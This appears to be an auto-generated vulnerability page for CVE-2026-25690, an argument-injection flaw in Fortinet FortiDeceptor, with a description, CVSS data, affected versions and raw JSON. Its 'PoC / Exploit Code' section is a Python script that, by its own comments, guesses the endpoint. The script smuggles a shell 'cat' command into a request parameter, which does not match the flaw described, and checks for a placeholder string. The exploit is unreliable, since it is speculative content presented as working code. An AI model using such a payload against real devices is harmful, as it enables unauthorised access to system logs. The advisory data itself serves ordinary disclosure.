Security Vulnerability Report
CVE-2026-25690 CVSS 4.3 MEDIUM

CVE-2026-25690

Published: 2026-05-12 18:16:40
Last Modified: 2026-05-12 18:57:02

Description

An improper neutralization of argument delimiters in a command ('argument injection') vulnerability in Fortinet FortiDeceptor 6.0.0 through 6.0.2, FortiDeceptor 5.3.0 through 5.3.3, FortiDeceptor 5.2.0 through 5.2.1, FortiDeceptor 5.1 all versions, FortiDeceptor 5.0 all versions may allow an authenticated attacker with at least read-only admin permission to read log files via HTTP crafted requests.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FortiDeceptor 6.0.0 - 6.0.2
FortiDeceptor 5.3.0 - 5.3.3
FortiDeceptor 5.2.0 - 5.2.1
FortiDeceptor 5.1 all versions
FortiDeceptor 5.0 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Hypothetical endpoint based on vulnerability description)
target_url = "https://<target-ip>/api/logs"

# Attacker's credentials (Read-only admin)
username = "admin"
password = "password"

# Malicious payload to inject arguments for reading log files
# Example: injecting a file path argument via a vulnerable parameter
payload = {
    "action": "view",
    "file": "/var/log/fortideceptor/system.log",  # Attempting to read specific log
    # Injection vector might look like appending delimiter and file path
    "vulnerable_param": "normal_value; cat /var/log/fortideceptor/system.log",
}

try:
    # Sending the crafted HTTP request
    response = requests.post(
        target_url, auth=(username, password), data=payload, verify=False
    )

    # Check if the response contains the log data
    if response.status_code == 200 and "log content" in response.text:
        print("[+] Exploit successful! Log data leaked.")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
        print(response.status_code)
except Exception as e:
    print(f"Error: {e}")

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-138

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-25690",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:16:39.540",
    "lastModified": "2026-05-12T18:57:02.307",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper neutralization of argument delimiters in a command ('argument injection') vulnerability in Fortinet FortiDeceptor 6.0.0 through 6.0.2, FortiDeceptor 5.3.0 through 5.3.3, FortiDeceptor 5.2.0 through 5.2.1, FortiDeceptor 5.1 all versions, FortiDeceptor 5.0 all versions may allow an authenticated attacker with at least read-only admin permission to read log files via HTTP crafted requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-88"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-138",
        "source": "[email protected]"
      }
    ]
  }
}